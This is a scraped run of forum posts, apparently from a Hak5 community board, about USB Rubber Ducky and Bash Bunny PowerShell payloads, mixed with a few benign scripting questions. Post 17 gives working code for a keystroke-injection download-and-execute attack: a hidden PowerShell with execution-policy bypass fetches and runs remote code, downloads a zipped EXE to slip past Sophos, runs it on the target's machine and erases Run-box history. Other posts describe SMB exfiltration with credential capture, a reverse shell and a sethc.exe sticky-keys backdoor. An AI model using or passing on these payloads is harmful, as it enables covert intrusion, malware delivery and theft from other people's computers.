  17. How does it work / what is it? I have just found one of the fastest ways of executing as much PowerShell code as you want using the USB Rubber Ducky! This script works by grabbing your PowerShell code from an external website. The code the ducky inputs is only 93 Characters long which takes the ducky only around 2 seconds to input. Tutorial: First, you will need a website to upload your .TXT file with all the PowerShell code you wish to execute. You can use a website such as hostinger or 000webhost to create this file. Although, remember these servers may not have 100% uptime. Script for website: The code on my website looks something like this... Add-Type -AssemblyName System.IO.Compression.FileSystem function Unzip { param([string]$zipfile, [string]$outpath) [System.IO.Compression.ZipFile]::ExtractToDirectory($zipfile, $outpath) } $path = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" $arr = (Get-Item -Path $path).Property $url = "www.linkToEndPayload" $output = "$env:temp/test.zip"; $out = "$env:temp/Remake.txt"; Remove-Item -Path $output Invoke-WebRequest -Uri $url -OutFile $output Unzip $output "$env:temp/" Rename-Item -Path $out -NewName "Remake.exe" Start-Process -FilePath "$env:temp/Remake.exe" foreach($item in $arr) { if($item -ne "MRUList") { Remove-ItemProperty -Path $path -Name $item -ErrorAction SilentlyContinue } } This code downloads the .EXE payload (Which is stored in a .ZIP file.) We will be running this file on our subjects system. Then the code uses an imported C# library to extract a. ZIP file which allows us to bypass a web protection software called Sophos from blocking the .EXE that we are trying to download. The file is unzipped and then the .EXE is run. Finally, the code deletes the run box history that the ducky creates. Finally, we have to setup the ducky. The ducky simply grabs the above code with a quick web request and then executes it. The code is as short and simple as this... Script for ducky: DELAY 500 GUI r DELAY 100 STRING powershell -W Hidden -Exec Bypass $a = Invoke-WebRequest www.linkToPowershellCodeAbove.com/script.txt; Invoke-Expression $a ENTER That's it! Very fast powershell execution. You can have as much code as you want on the script website. The only disadvantage to this code is that you must be connected to a internet connection. PS: I'm not very good at PowerShell Scripting
  18. { SetEnviromentVariable ("WGet", "$MyInvocation.MyCommand.Path", "Machine" ) } I've never coded in powershell but i do know a lot about batch. I would like some help with a toolkit i'm developing and i need a powershell script that will be in the install directory that will add the environment variable to the "Machine". I'm trying to automate the installation of Wget for Cmd as it's an essential for my toolkit. Any Help would be greatly appreciated Thanks, $tRiZzY
  19. Hey guys.. Can someone help me out with this cmdlet error ? I've flashed my duck with no probs.. No spelling error from the scripts. When i keyed this manually with win+r key... STRING powershell ".((gwmi win32_volume -f 'label=''_''').Name+'d.cmd')" It created a folder inside of slurp but with no files exfiltrated.. And whenever i tried to run the inject with twin duck(1).. I got this error popped out instead. Did i missed something here ? Thank you.
  20. I've updated my psh_DownloadExecSMB payload to allow for exfiltration. psh_DownloadExecSMB will take any powershell payload, execute it and alert via green LED when it's completed. All file transfers happens over SMB to the Bash Bunny. In order to exfil data, have your powershell payload upload to \\\s\l\ -- this will be copied to the BB as loot. Bonus: Because this payload uses SMB, any captured SMB credentials will be stored as loot. My Repo: https://github.com/hink/bashbunny-payloads/tree/payload/pshExecFixes/payloads/library/execution/psh_DownloadExecSMB Pull Request: https://github.com/hak5/bashbunny-payloads/pull/268
  21. Discussion thread for the RevShellBack payload. I've seen quite a few Rubber Ducky projects to do with getting a reverse shell running on a PC so that the shell can be accessed remotely on a different computer. But what got me thinking is this: the Bash Bunny is a full-on Linux ARM computer, right? It has netcat and it can do HID and ethernet simultaneously. So.. why not use that instead? At first, this payload will use a bit of HID trickery to hide itself from an observer as best as it can. As soon as it has done executing the final PowerShell command, HID is no longer used. User-defined commands will be sent to the computer in the background. By default, 4 commands are executed as a demo: Write file (with content) to the desktop Eject CD/DVD tray (if it exists) -- thank PowerShell for making that possible Open calculator application Message box -- powered by PowerShell For information about the payload, the payload script itself and how to configure it, it can be found at this GitHub repository: https://github.com/uintdev/RevShellBack
  22. Has anyone addressed or had problems with running scripts on PowerShell. As the default on my windows 10 64bit all the lastest updates disables running of scripts, this can be changed with the Set-ExecutionPolicy but this needs Administrator access to change. Am I missing something really simple!?
  23. Hello all, I have 4 headless PCs here at my house and I was wondering in the event the internet goes down and I need to do a file transfer or something. Could I just plug the bash bunny in and have it execute a powershell script so I don't have to find a spare monitor and keyboard? Thanks, new to the bashbunny.
  24. Hi guys, Simple PowerShell question; If I want to copy a multi-line set of data to the clipboard, what is the best way to do it? I have the below at the moment, which successfully copies the data between the braces, however the variable $testing is literally copied as "$testing", and not as "blabla". Any better way of doing this? Thanks. $testing = "blabla" {Testing 1 Testing 2 Testing 3 $testing etc } | clip
  25. Hey I am super new to this, so forgive me if there is another payload like this, I looked around but could not find anything like it just yet. The payload copies CMD.exe to sethc.exe allowing you to press the shift key 5 times to open up a cmd line. Though the attack must be carried out when the user is logged in, you can still open the cmd line the same way even on the login screen. Let me know what you guys think, It's my first payload so I would appreciate any constructive criticism and any idea on how to make it better. https://github.com/InvaderSquibs/BashBunny/tree/master/payloads/library/StickyBunny
  • Create New...